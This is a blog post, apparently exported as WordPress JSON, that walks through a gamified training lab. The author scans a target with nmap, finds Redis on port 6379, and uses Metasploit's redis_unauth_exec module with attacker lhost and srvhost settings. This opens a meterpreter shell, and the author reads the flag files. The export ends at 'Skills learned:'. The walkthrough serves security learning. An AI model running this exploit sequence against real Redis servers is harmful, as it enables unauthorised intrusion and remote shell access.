{"id":544,"date":"2020-01-31T21:02:24","date_gmt":"2020-01-31T20:02:24","guid":{"rendered":"https:\/\/cybercop-training.ch\/?p=544"},"modified":"2020-01-31T21:02:24","modified_gmt":"2020-01-31T20:02:24","slug":"learn-it-security-with-gamification","status":"publish","type":"post","link":"https:\/\/cybercop-training.ch\/?p=544","title":{"rendered":"Learn IT-Security with gamification"},"content":{"rendered":"

I just stumbled accross this<\/a> funny little browser game. It’s a nice idea of gamification where you can learn some IT-Security skills.<\/p>\n

I thought I’ll give it a try, so let’s play \ud83d\ude09<\/p>\n

Start the lab to get a terminal on an attacker machine that has tools like Nmap, Metasploit, etc. installed. Your task is to get root on a target database server on the same network and in the process successfully complete the tasks on the left to win the cup!<\/p>\n

Finding the IP of the target server:<\/b>
\nRun «ip addr» on the shell to find all your interface IP addresses. One of the IPs will be in the range 192.X.Y.2. Your target server has the IP 192.X.Y.3<\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

First let’s check in the terminal what ip address we have:<\/p>\n

\"\"<\/a><\/p>\n

192.34.26.2 is our ip address. Our target must be 192.34.26.3<\/strong><\/p>\n

For the first flag we need to know on which port the redis server is running. Let’s perform a nmap scan.<\/p>\n

nmap -sS -sV -p- 192.34.26.3<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

The redis server is running on port 6379<\/strong> which is the first flag.<\/p>\n

\"\"<\/a><\/p>\n

Let’s go over to the next puzzle…<\/p>\n

\"\"<\/a><\/p>\n

For that we have to start the metasploit console…<\/p>\n

\"\"<\/a><\/p>\n

and do a query for «redit» to check the available exploits…<\/p>\n

\"\"<\/a><\/p>\n

The second flag must be: exploit\/linux\/redis\/redis_unauth_exec<\/strong><\/p>\n

\"\"<\/a><\/p>\n

So let’s check if we can run this exploit against our target server that we can solve the next flag \ud83d\ude42<\/p>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

use exploit\/linux\/redis\/redis_unauth_exec<\/strong><\/p>\n

check 192.34.26.3<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

show options<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

During documentation, the lab crashed once. After restarting I got a new ip address. Therfore attacker and target ip changed…<\/p>\n

set rhosts 192.60.1.3<\/strong><\/p>\n

set lhost 192.60.1.2<\/strong><\/p>\n

set srvhost 192.60.1.2<\/strong><\/p>\n

check<\/strong><\/p>\n

exploit<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

We have a meterpreter shell \ud83d\ude42<\/p>\n

Let’s see what we find. There is a file called flag, but no run sh shell script…<\/p>\n

\"\"<\/a><\/p>\n

leaving the root directory and see what we have…<\/p>\n

\"\"<\/a><\/p>\n

Ther’s the run.sh script<\/p>\n

cat \/run.sh<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

That’s the name of the service and our next flag<\/p>\n

\"\"<\/a><\/p>\n

Last flag<\/p>\n

\"\"<\/a><\/p>\n

cd \/root<\/strong><\/p>\n

cat flag<\/strong><\/p><\/blockquote>\n

\"\"<\/a><\/p>\n

\"\"<\/a><\/p>\n

Skills learned:<\/strong><\/p>\n